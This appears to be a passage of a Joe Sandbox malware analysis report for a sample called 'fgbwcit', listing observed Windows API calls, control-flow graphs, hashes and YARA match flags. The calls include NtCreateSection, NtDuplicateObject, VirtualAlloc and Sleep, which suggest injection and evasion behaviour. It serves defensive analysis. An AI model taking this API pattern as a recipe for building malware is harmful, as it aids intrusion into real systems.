                                                            • Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
                                                            • Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
                                                            • Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 517 2c3a53c-2c3a555 518 2c3a557-2c3a559 517->518 519 2c3a560-2c3a56c CreateToolhelp32Snapshot 518->519 520 2c3a55b 518->520 521 2c3a56e-2c3a574 519->521 522 2c3a57c-2c3a589 Module32First 519->522 520->519 521->522 527 2c3a576-2c3a57a 521->527 523 2c3a592-2c3a59a 522->523 524 2c3a58b-2c3a58c call 2c3a1fb 522->524 528 2c3a591 524->528 527->518 527->522 528->523
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C3A564
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 02C3A584
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C37000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2c37000_fgbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 686c79523a3b0b733c8bda8c62fd3f002e71bb9b7fcfb00df2f3e82d5542df4b
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: C6F09637600B146FD7217BF9AC8CB6E76E8AF8D624F100928E6C7950C0DB70E9554A61

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 530 2e80e0f-2e80e24 SetErrorMode * 2 531 2e80e2b-2e80e2c 530->531 532 2e80e26 530->532 532->531
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02E80223,?,?), ref: 02E80E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02E80223,?,?), ref: 02E80E1E
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2e80000_fgbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 57dacdb67886c003b0a5bbb9586af1258dae52b4a04d322c3a950f0f522bdb24
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: AAD0123214512877DB003A94DC09BCE7B1CDF05B66F008011FB0DD9080C770954046E5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 533 4019c0-4019c6 534 4019e7-401a46 call 40127e Sleep call 4014fb 533->534 535 4019c8-4019dd call 40127e 533->535 552 401a55-401a9a call 40127e 534->552 553 401a48-401a50 call 4015fb 534->553 553->552
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                            • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                            • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                            • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 567 4019e0-401a46 call 40127e Sleep call 4014fb 582 401a55-401a9a call 40127e 567->582 583 401a48-401a50 call 4015fb 567->583 583->582
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                            • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                            • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                            • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                            • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                            • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                            • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                            • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                            • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                            • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                            • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                            • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                            • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C3A24C
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C37000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_2c37000_fgbwcit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction ID: 2121ec5638ab992e842a685f410b1ed64ebbbf949b5d3a1c0c0a1028c8a325b6
                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                            • Instruction Fuzzy Hash: 1F113C79A40208EFDB01DF98C985E98BBF5AF08350F158094F9889B361D371EA50EF80
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                            • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                            • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                            • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                            APIs
                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681884380.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_400000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                            • String ID:
                                                            • API String ID: 4152845823-0
                                                            • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                            • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                            • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                            • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                            APIs
                                                            • LocalAlloc.KERNELBASE(00000000,02B18CE4,00415B2B), ref: 00415498
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: AllocLocal
                                                            • String ID:
                                                            • API String ID: 3494564517-0
                                                            • Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
                                                            • Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
                                                            • Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14
                                                            APIs
                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 004156C1
                                                            • WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 004156E5
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004156ED
                                                            • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 0041572D
                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415741
                                                            • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041574F
                                                            • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 0041575E
                                                            • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 0041576F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                                            • String ID: -
                                                            • API String ID: 113859268-2547889144
                                                            • Opcode ID: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
                                                            • Instruction ID: 7fd8cb6729a01aa94056f6f289b2ac9cdf2ab28260b2dbd3fc15e2ce888fda3c
                                                            • Opcode Fuzzy Hash: 180134d01320781e28bb83f214f0822788da48fb39761615eb959522fdd3605f
                                                            • Instruction Fuzzy Hash: C221F731A44304EBD721DFA4DC86BD97B70FB4C712F5140AAFA4DAA1C0CAB459C4CB59
                                                            APIs
                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 004157E4
                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004157FF
                                                            • HeapDestroy.KERNEL32(00000000), ref: 0041581E
                                                            • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415826
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.2681989608.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_40b000_fgbwcit.jbxd
                                                            Similarity
                                                            • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                                            • String ID:
                                                            • API String ID: 367530164-0
                                                            • Opcode ID: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
                                                            • Instruction ID: 68d425cf78a880d44cb9589aafc5291418f972827432eabaf25cd50abb90a3e4
                                                            • Opcode Fuzzy Hash: 7d7ac3b01430fe9ad0e2703191a3d2b1ef9951b1f664e152f897c0a4f0d85179
                                                            • Instruction Fuzzy Hash: 2401F270A82604DBE740FBB4ED89BDA7BA8F70C346F800036E60997280DA345C54CB9A